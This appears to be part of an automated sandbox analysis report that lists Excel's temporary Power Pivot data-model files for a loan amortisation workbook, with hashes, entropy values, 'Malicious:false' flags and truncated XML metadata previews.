                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Beginning Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Ending Balance.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8699), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8699
                                                                                                Entropy (8bit):5.142480689136721
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:bIMckwYWKzDUTnKjivTnKjBDaFrTWWKzDUTnKjivTnKjBDeFrhN:eK4KWKkVK4KWKoD
                                                                                                MD5:58DE8DD72F18785D97B9928CD521D73E
                                                                                                SHA1:F0663FD6762B962A80E06037560716C204939068
                                                                                                SHA-256:9058C81EA6A35620A374775C603E5885A5AEF7BA802740986CBAC2E1F5C3A645
                                                                                                SHA-512:871F5520DD2AFD03D3EE3A69388F56507E965798443E3250E5EA8711CA45113A42C9962AA234A624E6C082AF8D372D4F1DA446FFED33E3F27A938567C45EF09C
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Ending Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSi

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Interest.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8678), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8678
                                                                                                Entropy (8bit):5.139025538297742
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:KIMckwYWKzDUTnKjivTnKjBDTFrTWWKzDUTnKjivTnKjBDrFrhN:TK4KWKHVK4KWKfD
                                                                                                MD5:3012E1DFAB2F7B145795C5A407549760
                                                                                                SHA1:10110E5FF08F8DE17ECBFC691877B326A2E1C241
                                                                                                SHA-256:16F76D363916B8694799EBD11699498FF05E94CB72C414F45C9CF460634B7A0D
                                                                                                SHA-512:45C9124119FA970021C884208191FEE695323008C5E846E462B6D17358B25C3A234DC336FD8C3187645C7B380CBBFCFF3C1B5017927BECA8F96CA6485FEE4156
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Interest" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment Date (Month Index).0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8728), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8728
                                                                                                Entropy (8bit):5.144878974566288
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:rI7kwYWKzD/TnKjivTnKjBDqFrTWWKzD/TnKjivTnKjBDuFrhN:iK7KWKwVK7KWKkD
                                                                                                MD5:18E771D5B3067F50C971F9EC55104A24
                                                                                                SHA1:125B26CBBC235E02BDB801A3F27041D2E3975B63
                                                                                                SHA-256:5E5DCF71BEA97900AE550AFB324B6EBC0518B01CAF789617FDA49D26126BEED7
                                                                                                SHA-512:CFF3A5CA9C6255637ED0EB3E73B3C3B7D6B2FD73600906EAF3689E8AAFF673E05A15C20A34A5148F5AB663DBBDAA601A659B8A0BA4C0328216A53C835EF27B61
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month Index)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment Date (Month).0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8710), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8710
                                                                                                Entropy (8bit):5.144472421040484
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:PI7kwYWKzD/TnKjivTnKjBD2FrTWWKzD/TnKjivTnKjBDKFrhN:uK7KWKoVK7KWK8D
                                                                                                MD5:D9E5FFBFBACBB97271E17282DA5BC334
                                                                                                SHA1:8FE2D77890D929A3AF4B04D1E3F925EA30E17C0D
                                                                                                SHA-256:4F631B8127D4C3EB3E7D76052FE52164ED2FEEDC5FEF6F8F5EFB1C5D3E0555F0
                                                                                                SHA-512:FC5D31A00CB5673FA12ED00ED5ED88D0A895466C8BD1BA4DAD1533B9994D68B6EBAEEC747269FBDE31070AF4A39620A2E639173A6C22D7450A0DDFC954DF0533
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment Date (Quarter).0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8712), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8712
                                                                                                Entropy (8bit):5.145396332911431
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:FIdkwYWKzDOTnKjivTnKjBDYFrTWWKzDOTnKjivTnKjBD8FrhN:yKCKWKaVKCKWKOD
                                                                                                MD5:D11B5E6A96287A751C083F8A98CC3D38
                                                                                                SHA1:3D9137704C1FB04A7060E0C97B6DE451A9246C1E
                                                                                                SHA-256:CC5D2E535DEB0F7A33E2B8E94504DE670F59A0953E0C428AABF738FB81AC89A0
                                                                                                SHA-512:53684E5C7E2C02B5CEE0F89BEE750F83908E3B93B573C7FD1415A55C2B1290E74EF12573B5EE9A2E2466926441F483F296B2BA7F65279D9144CB8C36882D39C4
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Quarter)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">7</Records><RecordsPerSegment xsi:type="xsd:long">4</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment Date (Year).0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8707), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8707
                                                                                                Entropy (8bit):5.146420285168294
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:oIDkwYWKzDSTnKjivTnKjBD1FrTWWKzDSTnKjivTnKjBDtFrhN:lKWKWKxVKWKWK5D
                                                                                                MD5:63C024137FB3B293D7BB34A3A89A6F4F
                                                                                                SHA1:3F1E69388E3493173A61AF8407363CF089C22904
                                                                                                SHA-256:8DCDEE34221BABF26EF8ECF86975114E16BF2410F1B39AB38958D2D6C6EA5AB7
                                                                                                SHA-512:B378C06975BD66CB77BBEA3BE43E06CA7831F5B6939D1B0AE6D58972EFC47DFB4E8D1CB7F536171BF7367FCD7FBFF82B64B0861928134ABC959177B41E6A8472
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Year)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">14</Records><RecordsPerSegment xsi:type="xsd:long">11</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment Date.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5019), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5019
                                                                                                Entropy (8bit):5.1453213254807695
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ENfzvwMckwYWKggD0LXTnKjiDLXTnKjBDfFrAmN:OIMckwYWKzDUTnKjivTnKjBDfFrhN
                                                                                                MD5:01F64A0B558235370FF8C60B61686665
                                                                                                SHA1:FF21296406F24026FE4A2C4F403A760732C7B39E
                                                                                                SHA-256:C7F32914950BC9D536C7D72D237A56F42E8688DE9A26F5E645990B566EC20712
                                                                                                SHA-512:25B69593220464BE9FFD56000CE44994C5A5F87DF18960CE038D2226CFA77E11F185F1EB1C9F339BC9B9ABC37B071DDA274FBC42DEDE70AD27737333F76AE2AA
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Payment.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (10581), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):10581
                                                                                                Entropy (8bit):5.132956570141762
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YIykwYWKzDoTnKjioTnKjixTnKjBDlFr4WWKzDoTnKjioTnKjixTnKjBDdFrGN:UKcKFK8K9SKcKFK8KVk
                                                                                                MD5:074BA86ACD1AA2A736DF1B7B5835EB68
                                                                                                SHA1:9B35C955139C6F384F5AB945F1A07A2F643B337F
                                                                                                SHA-256:360E984898D02C37D4B6C5F875BC11C1F089CD8C3AFEDE892A3C745FC481F32C
                                                                                                SHA-512:8145D0770DA607B204D1217C9854C9065C4C3B998F8379D95D051E6EF9C6CE34D28C57271AE0AB3D23A5F2A7391133A81A78DBCE86671A31D8CDC111FEE4E299
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">3</Segments><Records xsi:type="xsd:long">5</Records><RecordsPerSegment xsi:type="xsd:long">2</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:type=

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Pmt No.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8672), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8672
                                                                                                Entropy (8bit):5.141963163639877
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AIMckwYWKzDUTnKjivTnKjBD9FrTWWKzDUTnKjivTnKjBDVFrhN:9K4KWKNVK4KWKlD
                                                                                                MD5:B3064A665766429AE7FA87AA3D8270B4
                                                                                                SHA1:C8EA998E366A4A634A53486BB8B6CF8FDA78F6DE
                                                                                                SHA-256:1F676741368A2923D483E6061BEFC459312CF940FE5DB71A1263ECB98B03C78B
                                                                                                SHA-512:651C4495FBA856975D3082B9B6535E8FAA821CC61942519B0C47006DEF13819C39E5CE18DF744DCADB21665096D3B003F4332AE017DF7E5E414193E0DBD98E90
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Pmt No" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:ty

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Principal.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8681), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8681
                                                                                                Entropy (8bit):5.1407745904201
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AIMckwYWKzDUTnKjivTnKjBD9FrTWWKzDUTnKjivTnKjBDVFrhN:9K4KWKtVK4KWKFD
                                                                                                MD5:9910E02F15E39AB29D0C706E1CB55EE2
                                                                                                SHA1:62F0A2654E01897068230FC49628325D2D32FBFD
                                                                                                SHA-256:D5FDEEAAC67168818C2681DC85EBCF7CCDEF898AA0E99513475A69A66AFE9E6D
                                                                                                SHA-512:49E2CA3FD31E1BE47872FCB2364A5B59020D7BCC4B3515F0B3BA5934EECCC2E740B6ABF825B71121EA032DAAA28EE229FA5A2721CFFB21CA7B3BF89FB29425D5
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Principal" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\Loan.21.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (64599), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):64599
                                                                                                Entropy (8bit):5.165256842747642
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:OAjKKOj4QjEKYjDxjKKOjCtKzKhKlyjyKOjnajyKOjP3jyKOjZFKuKyKDojdKijf:OgHfApx4Wghxj
                                                                                                MD5:D93A4684BEA8EE34FE6FB9C73BC03A39
                                                                                                SHA1:E801E80EFFAE16A10BC5BD1EF8A77E79DF7889F2
                                                                                                SHA-256:E0F686F17BE40DA51F9C5FB964E2708832587902AFA7E6D187D1E9D9DCC74F5E
                                                                                                SHA-512:A5F61B0ACC1373A5F465739595891953FCD6764713576A2C5090ED1661BDDF178AFDE51CEEE7B1C14B15F3CC720031F47B8ABA80F2DE267A22335776D107854D
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="Loan" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">21</Version><Settings xsi:type="xsd:long">4097</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMMultiPartSegmentMap" ProviderVersion="0"><Properties><FirstPartitionRecordCount xsi:type="xsd:long">0</FirstPartitionRecordCount><FirstPartitionSegmentCount xsi:type="xsd:long">0</FirstPartitionSegmentCount></Properties><Collections><Collection><Name>Partitions</Name><XMObject class="XMSegment1Map" ProviderVersion="0"><Properties><Records xsi:type="xsd:long">360</Records></Properties></XM

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\info.44.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.043108582202338
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:tDLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:tDLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:7D1678433245EC05776715BAD2F149A4
                                                                                                SHA1:7F843EF3D86EC6397E893E245385CF654275C9BB
                                                                                                SHA-256:C81B36E3CBE12137D9F2EF62376CD4C0849005537764E7633B0C08150C29F315
                                                                                                SHA-512:1025EE2F3D279CC4CCA9D59F4B624426E1A1A9DA6D99B5B82817000CA4E2555C8BBAA2A31A58484A19DB95CFBBE475805D9643E1F4ECEC10E91137C805B18B4C
                                                                                                Malicious:false
                                                                                                Preview:<Dimension xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>21</DataVersion><IndexVersion>21</IndexVersion><DecodeStoreVersion>-1</DecodeStoreVersion><LevelStoreVersion>-1</LevelStoreVersion><Properties><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m_cSegment>0</m_cSegment><m_mskFormat>269484288</m_mskFormat><m_cbHeader>0</m_cbHeader><m_cPath>0</m_cPath><m_cData>0</m_cData><m_cSegmentIndex>4294967295</m_cSegmentIndex><MapDataIndices/><MinMaxValues/></MapDataset><Depth>0</Depth><Balanced>false</Balanced><HasHoles>false</HasHoles></Property><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.44.dim.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13986), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):39181
                                                                                                Entropy (8bit):5.222077368585785
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:78K3c2+4c2+kc2+Uc2+7c2+cc2+9c2+Vn2+UQTQfQJQ9Q7QTQlQrQTQWc2+Qc2+B:7/QTQfQJQ9Q7QTQlQrQTQP7S5ZqB
                                                                                                MD5:2C4239F787F85843717B310DC74E5676
                                                                                                SHA1:B2729F8C7FBF0B22DB0B17D90348C5DB2A312C7C
                                                                                                SHA-256:2313BA098258949724427AB15B09F82010543F7845E5FA28B1B6DE7978A1A35F
                                                                                                SHA-512:E055EB80DEBC7910305924EA9A9081436458079DFE33F4005D7FF8BAA350A300913C21802AF70EFA49D1ACBF02843199EB123D5CB0AFC6ED0F4A69A614532163
                                                                                                Malicious:false
